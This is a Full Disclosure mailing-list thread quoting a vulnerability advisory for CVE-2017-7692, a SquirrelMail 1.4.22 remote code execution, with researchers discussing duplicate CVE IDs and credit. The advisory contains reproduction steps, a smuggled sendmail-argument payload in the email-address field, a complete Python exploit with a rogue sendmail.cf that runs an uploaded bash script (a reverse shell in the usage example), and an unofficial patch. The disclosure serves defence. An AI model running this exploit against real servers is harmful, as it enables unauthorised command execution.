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Re: [FD] CVE-2017-7692: Squirrelmail 1.4.22 Remote Code Execution

Hi Dawid,
ok great, I added the credits to the advisory..  now let's see what to do with 
the CVEs.


> On 19 Apr 2017, at 17:56, Dawid Golunski <dawid@xxxxxxxxxxxxxxxx> wrote:
> Hi Filippo,
> From the feedback I received several weeks ago, the vendor was having
> some life issues and was unable to respond to it so I decided to give
> more time before disclosure in this case.
> I've sent him a quick email now too to point at this thread  in case
> he manages to release an official patch any time soon.
> I will release my advisory/exploit shortly on my website
> https://legalhackers.com seeing that it is now public.
> I'll verify with MITRE what to do with the duplicate CVEID and which
> one should be used for this issue and let you know.
> Credit would be appreciated. I'll mention yours in my advisory too.
> Thanks.
> On Wed, Apr 19, 2017 at 12:40 PM, Filippo Cavallarin
> <filippo.cavallarin@xxxxxxxxxxxxxxxx> wrote:
>> Hi Dawid,
>> I tried quite hard to contact the vendor but without success, then I decided 
>> to release all the details and a fix..
>> I think the CVE I got should be rejected and marked as duplicate, but I 
>> don't know how to handle situations like this.. any idea?
>> In the meantime, do you want me to put your name in the credits on my 
>> website?
>> Best,
>> Filippo
>>> On 19 Apr 2017, at 16:36, Dawid Golunski <dawid@xxxxxxxxxxxxxxxx> wrote:
>>> Hi Filippo,
>>> I actually reported this vulnerability to the vendor at the beginning
>>> of this year.  I also got the following CVEID assigned for it in
>>> January: CVE-2017-5181.
>>> I was waiting on the vendor to patch the vulnerability since then
>>> before I publish the details.
>>> Has he got back to you?
>>> On Wed, Apr 19, 2017 at 10:07 AM, Filippo Cavallarin
>>> <filippo.cavallarin@xxxxxxxxxxxxxxxx> wrote:
>>>> Advisory ID:           SGMA17-001
>>>> Title:                 Squirrelmail Remote Code Execution
>>>> Product:               Squirrelmail
>>>> Version:               1.4.22 and probably prior
>>>> Vendor:                squirrelmail.org
>>>> Type:                  Command Injection
>>>> Risk level:            4 / 5
>>>> Credit:                filippo.cavallarin@xxxxxxxxxxxxxxxx
>>>> CVE:                   CVE-2017-7692
>>>> Vendor notification:   2017-04-04
>>>> Vendor fix:            N/A
>>>> Public disclosure:     2017-04-19
>>>> Squirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote 
>>>> code execution vulnerability because
>>>> it fails to sanitize a string before passing it to a popen call. It's 
>>>> possible to exploit this vulnerability to
>>>> execute arbitrary shell commands on the remote server.
>>>> The problem is in Deliver_SendMail.class.php on initStream function that 
>>>> uses escapeshellcmd() to sanitize the
>>>> sendmail command before executing it. The use of escapeshellcmd() is not 
>>>> correct in this case since it don't
>>>> escapes whitespaces allowing the injection of arbitrary command parameters.
>>>>     $this->sendmail_command = "$sendmail_path $this->sendmail_args 
>>>> -f$envelopefrom";
>>>>     $stream = popen(escapeshellcmd($this->sendmail_command), "w");
>>>> The $envelopefrom variable is controlled by the attacker, hence it's 
>>>> possible to trick sendmail to use an
>>>> attacker-provided configuration file that triggers the execution of an 
>>>> arbitrary command.
>>>> In order to exploit this vulnerability the MTA in use must be sendmail and 
>>>> Squirrelmail must be configured
>>>> to use it as commandline (useSendmail directive of the config file set to 
>>>> true).
>>>> Also, the edit_identity directive of the config file must be bet to true, 
>>>> but this is the default configuration.
>>>> To reproduce the issue follow these steps:
>>>>       1. Create a rogue sendmail.cf that triggers the execution of a 
>>>> /usr/bin/touch:
>>>>               [...]
>>>>               Mlocal,         P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, 
>>>> S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
>>>>               T=DNS/RFC822/X-Unix,
>>>>               A=X /tmp/executed
>>>>       2. Upload it as a mail attachment and get it's remote name (ex: 
>>>> lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)
>>>>       3. Go to Options -> Personal Informations and set the following 
>>>> payload as Email Address:
>>>>               <aaa@xxxxxxx -OQueueDirectory=/tmp  -C 
>>>> /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>
>>>>       4. Send an email
>>>>       5. Verify the execution of the command with "ls /tmp/executed" on 
>>>> the remote server
>>>> The followig python script exploits this vulnerability to execute an 
>>>> attacker provided bash script on the remote server.
>>>> BOF
>>>> #!/usr/bin/env python
>>>> # -*- coding: utf-8 -*-
>>>> """
>>>> SquirrelMail 1.4.22 Remote Code Execution (authenticated)
>>>> Exploit code for CVE-2017-7692
>>>> filippo.cavallarin@xxxxxxxxxxxxxxxx
>>>> """
>>>> from __future__ import unicode_literals
>>>> import sys
>>>> import os
>>>> import re
>>>> import requests
>>>> reload(sys)
>>>> sys.setdefaultencoding('utf8')
>>>> SENDMAILCF="/tmp/squirrelmail1_4_22-sendmailcf-rce"
>>>> COMPOSE = "/src/compose.php"
>>>> INFOS = "/src/options.php?optpage=personal"
>>>> SQM_ATTACH_PATH = "/var/local/squirrelmail/attach/"
>>>> # must be enclosed in <> otherwise spaces will be removed ..
>>>> SENDER = "<px@xxxxxxxx -OQueueDirectory=/tmp  -C %s%s>"
>>>> SESSID = ""
>>>> BASEURL = ""
>>>> def attach(attachment):
>>>> url = "%s%s" % (BASEURL, COMPOSE)
>>>> token = get_csrf_token(url)
>>>> values = {
>>>>   "smtoken": token,
>>>>   "attach": "add"
>>>> }
>>>> try:
>>>>   files = {'attachfile': open(attachment,'rb')}
>>>>   resp = requests.post(url, files=files, data=values, 
>>>> cookies={'SQMSESSID':SESSID})
>>>>   fname = 
>>>> re.search(r'att_local_name&quot;;s:[0-9]+:&quot;([a-zA-Z0-9]+)&quot;', 
>>>> resp.text)
>>>>   if not fname:
>>>>     print "\nError: unable to upload file %s" % attachment
>>>>   return fname.group(1)
>>>> except Exception as e:
>>>>   print "\nError: %s" % e
>>>>   sys.exit(1)
>>>> def send():
>>>> url = "%s%s" % (BASEURL, COMPOSE)
>>>> token = get_csrf_token(url)
>>>> values = {
>>>>   "smtoken": token,
>>>>   "send_to": "root",
>>>>   "send": "Send"
>>>> }
>>>> try:
>>>>   resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})
>>>> except Exception as e:
>>>>   print "\nError: %s" % e
>>>>   sys.exit(1)
>>>> def set_identity(sender):
>>>> url = "%s%s" % (BASEURL, INFOS)
>>>> token = get_csrf_token(url)
>>>> values = {
>>>>   "smtoken": token,
>>>>   "optpage": "personal",
>>>>   "optmode": "submit",
>>>>   "new_email_address": sender,
>>>>   "submit_personal": "Submit"
>>>> }
>>>> try:
>>>>   requests.post(url, data=values, cookies={'SQMSESSID':SESSID})
>>>> except Exception as e:
>>>>   print "\nError: %s" % e
>>>>   sys.exit(1)
>>>> def get_csrf_token(url):
>>>> try:
>>>>   body = requests.get(url, cookies={'SQMSESSID':SESSID}).text
>>>>   inp = re.search(r'<input.*name="smtoken".*>', body, re.MULTILINE)
>>>>   token = re.search(r'value="([a-zA-Z0-9]+)"', inp.group(0))
>>>>   if token:
>>>>     return token.group(1)
>>>> except Exception as e:
>>>>   pass
>>>> print "\nUnable to get CSRF token"
>>>> sys.exit(1)
>>>> def outw(s):
>>>> sys.stdout.write(s)
>>>> sys.stdout.flush()
>>>> def main(argv):
>>>> global BASEURL
>>>> global SESSID
>>>> if len(argv) != 4:
>>>>   print (
>>>>       "SquirrelMail 1.4.22 Remote Code Execution (authenticated) - 
>>>> filippo.cavallarin@xxxxxxxxxxxxxxxx\n"
>>>>       "The target server must use sendmail and squirrelmail must be 
>>>> configured to use /usr/bin/sendmail\n"
>>>>       "Usage:\n"
>>>>       "  %s <url> <session_id> <script>\n"
>>>>       "      url: the url of squirrelmail\n"
>>>>       "      session_id: the value of SQMSESSID cookie\n"
>>>>       "      script: the path to the bash script to be executed on the 
>>>> target\n"
>>>>       "Example:\n"
>>>>       "  %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 
>>>> reverseshell.sh"
>>>>     ) % (argv[0], argv[0])
>>>>   sys.exit(1)
>>>> BASEURL = argv[1]
>>>> SESSID = argv[2]
>>>> script = argv[3]
>>>> outw("Uploading script ... ")
>>>> script_fname = attach(script)
>>>> print "ok"
>>>> outw("Generating sendmail.cf ... ")
>>>> try:
>>>>   script_path = "%s%s" % (SQM_ATTACH_PATH, script_fname)
>>>>   with open(SENDMAILCF, 'w') as f:
>>>>     f.write(SENDMAILCF_CONTENT % script_path)
>>>> except Exception as e:
>>>>   print "\nError: %s" % e
>>>>   sys.exit(1)
>>>> print "ok"
>>>> outw("Uploading sendmail.cf ... ")
>>>> smc_fname = attach(SENDMAILCF)
>>>> os.remove(SENDMAILCF)
>>>> print "ok"
>>>> outw("Updating user options ... ")
>>>> sender = SENDER % (SQM_ATTACH_PATH, smc_fname)
>>>> set_identity(sender)
>>>> print "ok"
>>>> outw("Checking identity field ... ")
>>>> icheck = requests.get("%s%s" % (BASEURL, INFOS), 
>>>> cookies={'SQMSESSID':SESSID}).text
>>>> if not smc_fname in icheck:
>>>>   print "\nError: unable to set identity field .. maybe squirrelmail is 
>>>> configured with edit_identity=false"
>>>>   sys.exit(1)
>>>> print "ok"
>>>> outw("Executing script ... ")
>>>> send()
>>>> print "ok\n"
>>>> sys.exit(0)
>>>> O 
>>>> DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile
>>>> Kdequote dequote
>>>> Scanonify=3
>>>> R$@     $@ <@>
>>>> R$*     $: $1 <@>     mark addresses
>>>> R$* < $* > $* <@> $: $1 < $2 > $3     unmark <addr>
>>>> R@ $* <@>   $: @ $1       unmark @host:...
>>>> R$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ]   unmark IPv6 addr
>>>> R$* :: $* <@>   $: $1 :: $2     unmark node::addr
>>>> R:include: $* <@> $: :include: $1     unmark :include:...
>>>> R$* : $* [ $* ]   $: $1 : $2 [ $3 ] <@>   remark if leading colon
>>>> R$* : $* <@>    $: $2       strip colon if marked
>>>> R$* <@>     $: $1       unmark
>>>> R$* ;        $1       strip trailing semi
>>>> R$* < $+ :; > $*  $@ $2 :; <@>      catch <list:;>
>>>> R$* < $* ; >       $1 < $2 >      bogus bracketed semi
>>>> R$@     $@ :; <@>
>>>> R$*     $: < $1 >     housekeeping <>
>>>> R$+ < $* >       < $2 >     strip excess on left
>>>> R< $* > $+       < $1 >     strip excess on right
>>>> R<>     $@ < @ >      MAIL FROM:<> case
>>>> R< $+ >     $: $1       remove housekeeping <>
>>>> R@ $+ , $+    $2
>>>> R@ [ $* ] : $+    $2
>>>> R@ $+ : $+    $2
>>>> R $+ : $* ; @ $+  $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax
>>>> R $+ : $* ;   $@ $1 : $2;     list syntax
>>>> R$+ @ $+    $: $1 < @ $2 >      focus on domain
>>>> R$+ < $+ @ $+ >   $1 $2 < @ $3 >      move gaze right
>>>> R$+ < @ $+ >    $@ $>Canonify2 $1 < @ $2 >  already canonical
>>>> R$- ! $+    $@ $>Canonify2 $2 < @ $1 .UUCP >  resolve uucp names
>>>> R$+ . $- ! $+   $@ $>Canonify2 $3 < @ $1 . $2 >   domain uucps
>>>> R$+ ! $+    $@ $>Canonify2 $2 < @ $1 .UUCP >  uucp subdomains
>>>> R$* %% $*   $1 @ $2       First make them all @s.
>>>> R$* @ $* @ $*   $1 %% $2 @ $3     Undo all but the last.
>>>> R$* @ $*    $@ $>Canonify2 $1 < @ $2 >  Insert < > and finish
>>>> R$*     $@ $>Canonify2 $1
>>>> SCanonify2=96
>>>> R$* < @ localhost > $*    $: $1 < @ $j . > $2   no domain at all
>>>> R$* < @ localhost . $m > $* $: $1 < @ $j . > $2   local domain
>>>> R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2   .UUCP domain
>>>> R$* < @ [ $+ ] > $*   $: $1 < @@ [ $2 ] > $3    mark [addr]
>>>> R$* < @@ $=w > $*   $: $1 < @ $j . > $3   self-literal
>>>> R$* < @@ $+ > $*    $@ $1 < @ $2 > $3   canon IP addr
>>>> Sfinal=4
>>>> R$+ :; <@>    $@ $1 :       handle <list:;>
>>>> R$* <@>     $@        handle <> and list:;
>>>> R$* < @ $+ . > $* $1 < @ $2 > $3
>>>> R$* < @ *LOCAL* > $*  $1 < @ $j > $2
>>>> R$* < $+ > $*   $1 $2 $3      defocus
>>>> R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3    <route-addr> canonical
>>>> R@ $*     $@ @ $1       ... and exit
>>>> R$+ @ $- . UUCP   $2!$1       u@xxxxxx => h!u
>>>> R$+ %% $=w @ $=w    $1 @ $2       u%%host@host => u@host
>>>> SRecurse=97
>>>> R$*     $: $>canonify $1
>>>> R$*     $@ $>parse $1
>>>> Sparse=0
>>>> R$*     $: $>Parse0 $1    initial parsing
>>>> R<@>      $#local $: <@>    special case error msgs
>>>> R$*     $: $>ParseLocal $1  handle local hacks
>>>> R$*     $: $>Parse1 $1    final parsing
>>>> SParse0
>>>> R<@>      $@ <@>      special case error msgs
>>>> R$* : $* ; <@>    $#error $@ 5.1.3 $: "553 List:; syntax illegal for 
>>>> recipient addresses"
>>>> R@ <@ $* >    < @ $1 >    catch "@@host" bogosity
>>>> R<@ $+>     $#error $@ 5.1.3 $: "553 User address required"
>>>> R$+ <@>     $#error $@ 5.1.3 $: "553 Hostname required"
>>>> R$*     $: <> $1
>>>> R<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4
>>>> R<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4
>>>> R<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: "553 Invalid address"
>>>> R<> $* < @ [ $+ ] > $*    $1 < @ [ $2 ] > $3
>>>> R<> $* <$* : $* > $*  $#error $@ 5.1.3 $: "553 Colon illegal in host name 
>>>> part"
>>>> R<> $*      $1
>>>> R$* < @ . $* > $* $#error $@ 5.1.2 $: "553 Invalid host name"
>>>> R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "553 Invalid host name"
>>>> R$* < @ $* @ > $* $#error $@ 5.1.2 $: "553 Invalid route address"
>>>> R$* @ $* < @ $* > $*  $#error $@ 5.1.3 $: "553 Invalid route address"
>>>> R$* , $~O $*    $#error $@ 5.1.3 $: "553 Invalid route address"
>>>> R$* < @ > $*    $@ $>Parse0 $>canonify $1 user@ => user
>>>> R< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... -> ...
>>>> R$- < @ $=w . >   $: $(dequote $1 $) < @ $2 . > dequote "foo"@here
>>>> R< @ $+ >   $#error $@ 5.1.3 $: "553 User address required"
>>>> R$* $=O $* < @ $=w . >  $@ $>Parse0 $>canonify $1 $2 $3 ...@here -> ...
>>>> R$-       $: $(dequote $1 $) < @ *LOCAL* >  dequote "foo"
>>>> R< @ *LOCAL* >    $#error $@ 5.1.3 $: "553 User address required"
>>>> R$* $=O $* < @ *LOCAL* >
>>>>     $@ $>Parse0 $>canonify $1 $2 $3 ...@*LOCAL* -> ...
>>>> R$* < @ *LOCAL* > $: $1
>>>> SParse1
>>>> R$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3  numeric internet 
>>>> spec
>>>> R$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3  Add smart host to path
>>>> R$* < @ [ $+ ] : > $*   $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost: 
>>>> send
>>>> R$* < @ [ $+ ] : $- : $*> $*  $#$3 $@ $4 $: $1 < @ [$2] > $5  smarthost 
>>>> with mailer
>>>> R$* < @ [ $+ ] : $+ > $*  $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost 
>>>> without mailer
>>>> R$=L < @ $=w . >  $#local $: @ $1     special local names
>>>> R$+ < @ $=w . >   $#local $: $1     regular local name
>>>> R$* < @ $* > $*   $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on 
>>>> smarthost name
>>>> R$* < @$* > $*    $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain
>>>> R$=L      $#local $: @ $1   special local names
>>>> R$+     $#local $: $1     regular local names
>>>> SLocal_localaddr
>>>> Slocaladdr=5
>>>> R$+     $: $1 $| $>"Local_localaddr" $1
>>>> R$+ $| $#ok   $@ $1     no change
>>>> R$+ $| $#$*   $#$2
>>>> R$+ $| $*   $: $1
>>>> R$+ + *     $#local $@ $&h $: $1
>>>> R$+ + $*    $#local $@ + $2 $: $1 + *
>>>> R$+     $: <> $1
>>>> R< > $+     $: < > < $1 <> $&h >    nope, restore +detail
>>>> R< > < $+ <> + $* > $: < > < $1 + $2 >    check whether +detail
>>>> R< > < $+ <> $* > $: < > < $1 >     else discard
>>>> R< > < $+ + $* > $*    < > < $1 > + $2 $3   find the user part
>>>> R< > < $+ > + $*  $#local $@ $2 $: @ $1   strip the extra +
>>>> R< > < $+ >   $@ $1       no +detail
>>>> R$+     $: $1 <> $&h      add +detail back in
>>>> R$+ <> + $*   $: $1 + $2      check whether +detail
>>>> R$+ <> $*   $: $1       else discard
>>>> R< local : $* > $*  $: $>MailerToTriple < local : $1 > $2 no host extension
>>>> R< error : $* > $*  $: $>MailerToTriple < error : $1 > $2 no host extension
>>>> R< $~[ : $+ > $+  $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >
>>>> R< $+ > $+    $@ $>MailerToTriple < $1 > $2 < @ $1 >
>>>> SParseLocal=98
>>>> SEnvFromL
>>>> R<@>      $n      errors to mailer-daemon
>>>> R@ <@ $*>   $n      temporarily bypass Sun bogosity
>>>> R$+     $: $>AddDomain $1 add local domain if needed
>>>> R$*     $: $>MasqEnv $1   do masquerading
>>>> SEnvToL
>>>> R$+ < @ $* >    $: $1     strip host part
>>>> R$+ + $*    $: < $&{addr_type} > $1 + $2  mark with addr type
>>>> R<e s> $+ + $*    $: $1     remove +detail for sender
>>>> R< $* > $+    $: $2     else remove mark
>>>> SHdrFromL
>>>> R<@>      $n      errors to mailer-daemon
>>>> R@ <@ $*>   $n      temporarily bypass Sun bogosity
>>>> R$+     $: $>AddDomain $1 add local domain if needed
>>>> R$*     $: $>MasqHdr $1   do masquerading
>>>> SHdrToL
>>>> R$+     $: $>AddDomain $1 add local domain if needed
>>>> R$*     $: $>MasqHdr $1   do all-masquerading
>>>> SAddDomain
>>>> R$* < @ $* > $*   $@ $1 < @ $2 > $3 already fully qualified
>>>> R$+     $@ $1 < @ *LOCAL* > add local qualification
>>>> Mlocal,   P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, 
>>>> R=EnvToL/HdrToL,
>>>>   T=DNS/RFC822/X-Unix,
>>>>   A=X %s
>>>> Mprog,    P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, 
>>>> D=$z:/,
>>>>   T=X-Unix/X-Unix/X-Unix,
>>>>   A=sh -c $u
>>>> """
>>>> if __name__ == '__main__':
>>>> main(sys.argv)
>>>> EOF
>>>> Since the vendor did not respond to our mails, no official fix is 
>>>> available.
>>>> However, the following unofficial patch can be used to fix this 
>>>> vulnerability.
>>>> BOF
>>>> diff -ruN 
>>>> squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 
>>>> squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
>>>> --- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php  
>>>> 2011-01-06 02:44:03.000000000 +0000
>>>> +++ 
>>>> squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
>>>>   2017-04-18 11:42:26.505181944 +0000
>>>> @@ -93,9 +93,9 @@
>>>>        $envelopefrom = trim($from->mailbox.'@'.$from->host);
>>>>        $envelopefrom = 
>>>> str_replace(array("\0","\n"),array('',''),$envelopefrom);
>>>>        // save executed command for future reference
>>>> -        $this->sendmail_command = "$sendmail_path $this->sendmail_args 
>>>> -f$envelopefrom";
>>>> +        $this->sendmail_command = escapeshellcmd("$sendmail_path 
>>>> $this->sendmail_args -f") . escapeshellarg($envelopefrom);
>>>>        // open process handle for writing
>>>> -        $stream = popen(escapeshellcmd($this->sendmail_command), "w");
>>>> +        $stream = popen($this->sendmail_command, "w");
>>>>        return $stream;
>>>>    }
>>>> EOF
>>>> https://squirrelmail.org/
>>>> https://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html
>>> --
>>> Regards,
>>> Dawid Golunski
>>> https://legalhackers.com
>>> t: @dawid_golunski
> -- 
> Regards,
> Dawid Golunski
> https://legalhackers.com
> t: @dawid_golunski

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